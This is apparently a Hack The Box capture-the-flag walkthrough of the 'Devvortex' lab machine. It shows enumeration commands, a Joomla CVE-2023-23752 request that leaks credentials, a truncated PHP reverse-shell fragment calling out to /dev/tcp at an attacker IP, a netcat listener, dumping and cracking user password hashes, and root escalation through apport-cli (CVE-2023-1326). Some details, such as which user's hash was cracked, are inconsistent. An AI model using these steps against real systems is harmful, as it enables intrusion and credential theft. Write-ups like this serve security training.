# HTB - Devvortex
## Enumeration Phase:
### Nmap scan
First off, I started my enumeration with an Nmap scan of **`10.10.11.242`**. The options I regularly use are: **-`sC`** is the equivalent to **`--script=default`** and runs a collection of Nmap enumeration scripts against the target, **`-sV`** does a service scan.
```
nmap -sC -sV 10.10.11.242
```
I added **`devvortex.htb`** to `/etc/hosts` next to the IP of the box which is **`10.10.11.242`**
Since I still didn't have a way in, the next place to enumerate was **HTTP** on port **80**. Navigating to **`http://devvortex.htb`**
### Brute-force hidden directories:
After visiting **`http://devvortex.htb`** I decided to brute-force hidden directories with Gobuster and didn't find anything :cry:
```
gobuster dir -u devvortex.htb -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -fs 200
```
### Subdomain enumeration:
I used also gobuster for this host Subdomain enumeration and found **dev.devvortex.htb**
```
gobuster vhost -u devvortex.htb -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
```
I added **`dev.devvortex.htb`** to `/etc/hosts` next to the IP of the box which is **`10.10.11.242`**
After visiting **`http://dev.devvortex.htb`**
### Brute-force hidden directories:
I decided to brute-force hidden directories with Dirsearch and find **/administrator/** and **/Readme.txt** :tada:
```
dirsearch -u dev.devvortex.htb
```
On the **Administrator** page, I found out that is the login page of Joomla CMS.
On the **Readme.txt** page, I found out the version of **Joomla CMS 4.2**.
### Initial Foothold:
I found out that **Joomla CMS 4.2** is Vulnerable to **CVE-2023-23752** and used the tool **Curl** to get some sensitive information including the **Username** and **Password** of user **Lewis**.\
About **CVE-2023-23752** more on this link:
```
curl -v 'http://dev.devvortex.htb/api/index.php/v1/config/application?public=true'
```
After login on to the **Administrator** page with credentials that I found with Curl, I edited **error.php** which was located at **/template/Cassiopeia/error.php** and set up reverse shell script.
```
& /dev/tcp/10.10.14.175/9001 0>&1'");
?>
```
I ran **Netcat** to listen to incoming connections and used **Curl** to trigger a **reverse shell** at the **error.php** page.
```
nc -lvnp 9001
curl http://dev.devvortex.htb/templates/cassiopeia/error.php
```
**Boom!** I got the **shell** as **www-data**
### Owning User:
**Credentials** that I found with **Curl** have also a **Database name** so I went for MySQL checking.
```
mysql -u lewis -p
show databases;
use joomla
show tables;
```
```
select * from sd4fg_users;
```
Bingo :tada: I found the **hash** of **Lewis and** saved the hash locally in a .txt file.
```
echo 'HASH' >> hash.txt
```
I cracked the hash of **Logan** using the tool **John The Ripper**
```
sudo john --wordlist=/usr/share/wordlists/rockyou.txt --rules hash.txt
```
Sweet !!!! I log in as a user L**ogan** via **SSH**.
```
ssh logan@devvortex.htb
```
### Owning Root:
The **sudo -l** command gives me some interesting output
```
sudo -l
```
I found out that **Apport-cli** is Vulnerable to **CVE-2023-1326**\
About **CVE-2023-1326** more on this link: [**https://bugs.launchpad.net/ubuntu/+source/apport/+bug/2016023**](https://bugs.launchpad.net/ubuntu/+source/apport/+bug/2016023)
```
sudo apport-cli -c /bin/mysql less
v
!
id
```
